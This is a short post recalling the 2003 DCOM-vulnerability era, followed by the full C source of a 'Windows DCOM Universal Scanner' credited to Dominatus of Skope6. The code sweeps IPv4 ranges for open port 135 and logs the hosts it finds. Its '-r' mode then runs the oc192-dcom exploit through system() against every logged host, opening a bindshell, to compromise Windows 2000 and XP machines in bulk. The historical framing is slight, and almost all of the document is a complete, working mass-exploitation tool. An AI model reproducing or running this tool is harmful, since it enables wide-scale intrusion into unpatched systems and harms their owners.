This tool is old but an example that even novice practitioners can have damaging impact on computer systems.
It was used by several underground groups and purportedly compromised a (7) seven-figure number of computer systems around the world at the time of the infamous DCOM vulnerability in 2003/2004.
It relies on advanced exploitation and bug discovery by other groups but was prepared ahead of release by the Polish group who discovered the bug, as they gave a ~three weeks announcement before dropping the 0day. Surely this group was not the only one with such tools ready to go, with further payloads for after a shell was acquired 😉
Before the advent of services like Shodan groups would prescan large address ranges if they knew something was coming and/or they were on the cusp of finding vulnerabilities for a particular service. ISPs were not so strict back then so you could easily do this from home with no issues.
DCOM changed the way ISPs looked at port scanning policies. While not violating national laws they felt it was their moral duty to prevent enumeration techniques as much as possible.
/******************************Windows DCOM Universal Scanner************************\\\\\\\\\\\\
* Coded by Dominatus<[email protected]> \
* \
* This exploit was found by LSD<www.lsd-pl.net> \
* The program to exploit Win2k and WinXP universally was oc192.us Security. \
* I wrote this scanner though, which is what you are looking at right now. \
* \
* Please stop by irc.undernet.org/#kracknet and check out www.kracknet.org(which isn't finished\
* yet), and please check out www.hbx.us, which has free shell accounts, and currently hairball \
* needs some money to keep it up, so please help if you use his services. Check out *
* www.skope6.com, we're a new security group. We post a lot of computer and security *
* information. Come talk with us at irc.undernet.org/#skope6 *
* *
\ *
\ Note: Some ISPs block port 135, so you may have problems finding machines on certain ranges *
\ *
\ What this program does is either scan for machines with <port> open, with the option to log *
\ them to a file, or root the vulnerable IPs from a logfile from a scan, and exploits the OS *
\ you choose. *
\ *
\ YOU TAKE FULL RESPONSIBILITY FOR WHAT YOU DO WITH THIS PROGRAM *
\\\\\\\\\\\\\***********************************************************************************/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <fcntl.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#define ACTIVE 1
#define NOT_ACTIVE 0
#define MAXIMUM_SOCKS 200
struct connection
{
int sock;
char status;
time_t scan_time;
struct sockaddr_in addr;
};
struct connection ConnectionList[MAXIMUM_SOCKS];
void catchsig();
void initialize_connection(char *logFile);
void check_connection(char logFile[256]);
void rootlog(char *logFile);
void usage(char *argv0)
{
fprintf(stderr, "\n\n\n Windows DCOM Universal Scanner\n");
fprintf(stderr, " Coded by Dominatus<[email protected]>\n\n");
fprintf(stderr, " A Production of Skope6 Research Group\n");
fprintf(stderr, " www.skope6.com irc.undernet.org/#skope6/#kracknet www.kracknet.org\n\n");
fprintf(stderr, "==============================================================================================================\n");
fprintf(stderr, "+-- Skope6 Team: dominatus, sybah, eaglex, icecow, hairball, deversify, provizon, brotroxer, and lazurus --+\n");
fprintf(stderr, "==============================================================================================================\n\n");
fprintf(stderr, "**************************************************************************\n");
fprintf(stderr, "Usage:\n\n");
fprintf(stderr, "%s [IP] <-p> <-t> <-r> <-l> <-b> <-s>\n\n", argv0);
fprintf(stderr, "[IP]: IP to begin scanning at (1.0.0.0 - 255.255.255.255)\n");
fprintf(stderr, "-p <port>: Scan/exploit hosts on this port number(default: 135)\n");
fprintf(stderr, "-t <timeout>: Timeout in seconds for sockets(default: 5)\n");
fprintf(stderr, "-r <logfile>: Root the servers from a -l <logfile>\n");
fprintf(stderr, "-l <logfile>: Log hosts with port (default: 135) open in a logfile\n");
fprintf(stderr, "-b <port>: Bindshell port(default: 666)\n");
fprintf(stderr, "-s <selection>: Pick which OS you would like to exploit\n");
fprintf(stderr, " Targets: (use this only with option -r <logfile>)\n");
fprintf(stderr, " 0 Windows 2000 (Universal)\n");
fprintf(stderr, " 1 Windows XP (Universal)(default)\n");
fprintf(stderr, "**************************************************************************\n\n");
fprintf(stderr, "Examples:\n\n");
fprintf(stderr, "%s 207.0.0.1 -l vulnhosts.txt\n", argv0);
fprintf(stderr, "%s -r vulnhosts.txt -s 0 -p 136\n\n", argv0);
exit(0);
}
int startA = 1, startB = 0, startC = 0, startD = 0;
int port = 135;
int root = 0;
int log = 0;
int selection = 1;
int timeout = 5;
int bindport = 666;
char logfile[256];
char *win2k = "Windows 2000 (Universal)";
char *winxp = "Windows XP (Universal)";
int main(int argc, char *argv[])
{
int done = 0;
int i;
int k;
int ns;
int ret;
int opt;
char IP[16];
time_t scan_time;
FILE *logFile;
if (argc < 2)
{
usage(argv[0]);
}
sscanf(argv[1], "%d.%d.%d.%d", &startA, &startB, &startC, &startD);
while ((opt = getopt(argc, argv, "p:t:r:l:s:b:")) != EOF)
{
switch (opt)
{
case 'p':
port = atoi(optarg);
break;
case 't':
timeout = atoi(optarg);
break;
case 'r':
strncpy(logfile, optarg, sizeof(logfile));
logFile = fopen(logfile, "r+");
if (logFile == NULL)
{
fprintf(stderr, "Unable to append to %s\n", logfile);
exit(1);
}
fclose(logFile);
root = 1;
break;
case 'l':
if (optarg == NULL)
usage(argv[0]);
strncpy(logfile, optarg, sizeof(logfile));
logFile = fopen(logfile, "a+");
if (logFile == NULL)
{
fprintf(stderr, "Unable to append to %s\n", logfile);
exit(1);
}
fclose(logFile);
log = 1;
break;
case 's':
selection = atoi(optarg);
break;
case 'b':
bindport = atoi(optarg);
break;
case '?':
usage(argv[0]);
break;
default:
usage(argv[0]);
}
}
if (!root)
if (strlen(argv[1]) > 15)
usage(argv[0]);
initialize_connection(logfile);
scan_time = time(0);
if (log && root)
{
fprintf(stderr, "You can\'t use the -l(log) and -r(root hosts from log) together\n");
exit(1);
}
if (!root)
{
if (startA > 255 || startB > 255 || startC > 255 || startD > 255)
usage(argv[0]);
if (startA < 1 || startB < 0 || startC < 0 || startD < 0)
usage(argv[0]);
}
if (root)
rootlog(logfile);
else
signal(SIGINT, catchsig);
while (!done)
{
for (i = 0; i < MAXIMUM_SOCKS; i++)
{
if (ConnectionList[i].status == NOT_ACTIVE)
{
ConnectionList[i].sock = socket(AF_INET, SOCK_STREAM, 0);
if (ConnectionList[i].sock != -1)
{
ret = fcntl(ConnectionList[i].sock, F_SETFL, O_NONBLOCK);
if (ret == -1)
{
fprintf(stderr, "Unable to set O_NONBLOCK\n");
close(ConnectionList[i].sock);
}
else
{
memset((char *)IP, 0, sizeof(IP));
snprintf(IP, sizeof(IP), "%d.%d.%d.%d", startA, startB, startC, startD);
ConnectionList[i].addr.sin_addr.s_addr = inet_addr(IP);
if (ConnectionList[i].addr.sin_addr.s_addr == -1)
{
fprintf(stderr, "\nInvalid IP\n");
exit(1);
}
ConnectionList[i].addr.sin_family = AF_INET;
ConnectionList[i].addr.sin_port = htons(port);
ConnectionList[i].scan_time = time(0);
ConnectionList[i].status = ACTIVE;
startD++;
if (startD == 256)
{
if (startC < 255)
{
startD = 0;
startC++;
}
else
{
if (startB < 255)
{
startD = 0;
startC = 0;
startB++;
}
else
{
if (startA < 255)
{
startD = 0;
startC = 0;
startB = 0;
startA++;
}
else
{
fprintf(stderr, "Finished\n");
for (i = 0; i < MAXIMUM_SOCKS; i++)
close(ConnectionList[i].sock);
exit(0);
}
}
}
}
}
}
}
}
check_connection(logfile);
}
}
void catchsig()
{
int i;
fprintf(stderr, "\n\nCtrl+C caught\n");
fprintf(stderr, "Closing Connections...\n");
for (i = 0; i < MAXIMUM_SOCKS; i++)
{
close(ConnectionList[i].sock);
}
fprintf(stderr, "Connections Successfully Closed\n");
exit(0);
}
void initialize_connection(char *logFile)
{
int i;
for (i = 0; i < MAXIMUM_SOCKS; i++)
{
ConnectionList[i].status = NOT_ACTIVE;
memset((struct sockaddr_in *)&ConnectionList[i].addr, 0, sizeof(struct sockaddr_in));
}
fprintf(stderr, " Windows DCOM Universal Scanner\n");
fprintf(stderr, " coded by Dominatus<[email protected]>\n\n");
fprintf(stderr, " A Production of Skope6 Research Group\n");
fprintf(stderr, " www.skope6.com irc.undernet.org/#skope6/#kracknet www.kracknet.org\n\n\n");
if (!root)
{
fprintf(stderr, "Starting scan from %d.%d.%d.%d Port: 135 Timout: %d second(s)\n", startA, startB, startC, startD, timeout);
fprintf(stderr, "Press Ctrl+C to stop or Ctrl+Z to suspend\n\n");
}
}
void check_connection(char logFile[256])
{
int i;
int ret;
int selectionCheck = selection;
char IPaddress[16];
FILE *logf;
for (i = 0; i < MAXIMUM_SOCKS; i++)
{
if ((ConnectionList[i].scan_time < (time(0) - timeout)) && (ConnectionList[i].status == ACTIVE))
{
close(ConnectionList[i].sock);
ConnectionList[i].status = NOT_ACTIVE;
}
else if (ConnectionList[i].status == ACTIVE)
{
memset(ConnectionList[i].addr.sin_zero, 0, 8);
ret = connect(ConnectionList[i].sock, (struct sockaddr *)&ConnectionList[i].addr, sizeof(struct sockaddr_in));
strncpy(IPaddress, (char *)inet_ntoa(ConnectionList[i].addr.sin_addr), sizeof(IPaddress));
if (ret == -1)
{
if (errno == EISCONN)
{
fprintf(stderr, "%s\n", IPaddress, (time(0) - ConnectionList[i].scan_time));
close(ConnectionList[i].sock);
ConnectionList[i].status = NOT_ACTIVE;
}
if ((errno != EALREADY) && (errno != EINPROGRESS))
{
close(ConnectionList[i].sock);
ConnectionList[i].status = NOT_ACTIVE;
}
}
else
{
if (log)
{
logf = fopen(logFile, "a+");
fprintf(logf, "%s\n", IPaddress);
fclose(logf);
}
else
fprintf(stderr, "Host: %s\n", IPaddress);
close(ConnectionList[i].sock);
ConnectionList[i].status = NOT_ACTIVE;
}
}
}
}
void rootlog(char *logFile)
{
int selectionCheck = selection;
char IPaddress[256];
char exploitString[256];
FILE *logf;
logf = fopen(logFile, "r+");
fprintf(stderr, "\nHold Ctrl+C to quit\n");
while ((fgets(IPaddress, sizeof(IPaddress), logf)) != NULL)
{
if (selectionCheck == 0)
{
snprintf(exploitString, sizeof(exploitString), "./oc192-dcom -d %s -t %d -p %d -l %d", IPaddress, selectionCheck, port, bindport);
fprintf(stderr, "\nTrying to exploit %s using %s\n\n", IPaddress, win2k);
system(exploitString);
}
else if (selectionCheck == 1)
{
snprintf(exploitString, sizeof(exploitString), "./oc192-dcom -d %s -t %d -p %d -l %d", IPaddress, selectionCheck, port, bindport);
fprintf(stderr, "\nTrying to exploit %s using %s\n\n", IPaddress, winxp);
system(exploitString);
}
else
fprintf(stderr, "\nSomething Failed\n");
}
fprintf(stderr, "\nFinished\n");
exit(0);
}